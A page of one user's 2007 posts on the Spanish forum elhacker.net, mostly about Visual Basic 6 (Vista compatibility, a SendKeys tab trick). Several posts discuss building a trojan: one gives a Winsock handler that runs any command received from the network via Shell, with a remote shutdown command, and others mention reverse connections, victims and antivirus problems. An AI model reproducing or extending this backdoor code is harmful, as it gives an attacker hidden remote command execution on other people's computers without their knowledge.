elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 [13] 14 15 16
121  Programación / Programación Visual Basic / Re: VB6.0 y Win Vista en: 12 Junio 2007, 15:50 pm
Un amigo tiene instalado el Vista, y dice la mayoria de los ejecutables no funcionan, que te sale una ventanita diciendote lo de que se ha producido un error y debe cerrarse...Por el foro me dijeron q no pasaba nada de eso que funcionaban todos igual que en el xp o algo parecido,pero si a ti te pasa tambien...ya confirmado...

pd:A mi amigo tampoco le dejaba instalar el vb...

un saludo :) :)
122  Programación / Programación Visual Basic / Re: Desaparecerá VB 6.0 ? en: 3 Junio 2007, 18:30 pm
tengo entendido q los ejecutables (.exe) no funcionan en el vista...tienen q ser especificos,por ejemplo si ns creams algo en xp no funciona en vista,pone un error y sale lo tipico de "enviar","no enviar" y se cierra la plicacion...eso fastidia bastante,despues dice q es mas seguro...normal,si no ban los ejecutables.... :o :o :o

mejor XP :¬¬ :¬¬

un saludo ;) ;)
123  Programación / Programación Visual Basic / Re: Error critico en: 31 Mayo 2007, 17:07 pm
a mi me a salido ese mismo error un par de veces, y siempre cuando el ordenata me iba petadado y apunto decolgarse...supongo q tendra algo q ver con eso... :-\

un saludo ;) ;)
124  Programación / Programación Visual Basic / Re: Duda a la hora de crear un troyano en: 30 Mayo 2007, 15:15 pm
si,justo eso era mi duda..gracias!,esq no se me ocurria de ninguna forma :-\ jejeje

un saludo ;) ;)
125  Programación / Programación Visual Basic / Re: Text y la tecla Shiff en: 29 Mayo 2007, 23:18 pm
el ascii de la tecla tab es "9",pero puedes hacer esto::

crea 2 textbox,y escribe todo el rato teclas al azar..cambiara de casilla por cada tecla:

Código:
Private Sub Text1_Change()
Text2.SetFocus
End Sub

Private Sub Text2_Change()
SendKeys "{tab}"
End Sub

como puedes ver no necesitas el ascii del tab,solo con esribir eso ya   vale..(en el code se hace de 2 formas distintas..puedes usar para los 2 la misma..)

un saludo,espero q les sirviera algo de ayuda... ;D ;) ;)
126  Programación / Programación Visual Basic / Re: Duda a la hora de crear un troyano en: 29 Mayo 2007, 20:56 pm
Gracias EON!!!,esa tecnica intente usarla poniendo q desde el cliente enviara en un textbox "c:\" + text1.text, y q desde el cliente una vez leyera "c:\" + datos lo interpretara,el problema esq eso me funcionaba pero me avisaba un msgbox de todas formas cn los dats jejeje..
muxas gracias ;) ;)

saludos!
127  Programación / Programación Visual Basic / Duda a la hora de crear un troyano en: 29 Mayo 2007, 19:00 pm
bueno,mi duda es la siguiente::

yo,tengo el codigo de mi troyano hecho,el unico problema esq en el data arrival del server,para ejecutar kualkier archivo,tengo q colocar un "Else"(para q si los dats no son los definids anteriormente ejecute los nuevos datos...),bueno,pues esto obviamente funciona correctamente,el problema,esq yo quiero tambien q el server muestre un msgbox con los dats q lleguen,pero sin ejecutar a la vez estos...os pongo un ejemplo de lo k ocurre(no es mi troyano,es un ejemplo simple para q se entienda...):::


Código:
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
Winsock1.GetData datos
If datos = "apagar" Then
Shell "shutdown -s -t 00", vbHide
Else 'aki esta mi problema,q si los datos no son "apagar",ejecuta,hace un msgbox....
Shell datos, vbMaximizedFocus ' esto ejecuta los datos...pero y si yo quiero tener las 2 funciones(q ejecute y q cree un msgbox???)
End If
End Sub

el code esta perfecto,pero si yo quiero tener en el "else" dos funciones(ejecutar y enviar un msgbox)puedo??
esq lo q me sucede esq primero envia un msgbox con los datos,y despues ejecuta mi programa...

siento si esta un poco lioso pero esq es dificil de explicar.. :-\ :-\

pd:yo solucione este problema creando dos winsock,y q en el data arrival de uno ejecutara y en el otro creara un msgbox,pero es demasiado xapucero y da problemas cn los antivirus etc(por q si el infectado permite una conexion bieeen!! pero no creo q sea tan estupido de permitir varias conexiones del mismo programa en distintos puertos...)

un saludo y gracias de antemano  ;) ;)
128  Programación / Programación Visual Basic / Re: mecanico par esta conexion de trayano porfa!!(me tiene loco y soy nuevo!!) en: 29 Mayo 2007, 18:38 pm
yo estuve durante un tiempo siguiendo ese manual,hasta que consegui entender del todo como funcionaba la conexion inversa...yo tengo el codigo,pero mas o mens adaptado,y la verdad q si q funciona...postear el vuestro y vems q pasa.. :-\

un saludo ;) ;)
129  Programación / Programación Visual Basic / Re: Aplicacion cn winsock control sin necesidad de enviarlo a la victima!! en: 29 Mayo 2007, 18:31 pm
vale,el metodo q poesteao arriba,ya esta explicado en post posterioes...
un saludo ;) ;)
130  Programación / Programación Visual Basic / Re: POST y visua basic en: 28 Mayo 2007, 15:23 pm
ya lo suponia...un saludo ;) ;)
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 [13] 14 15 16
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines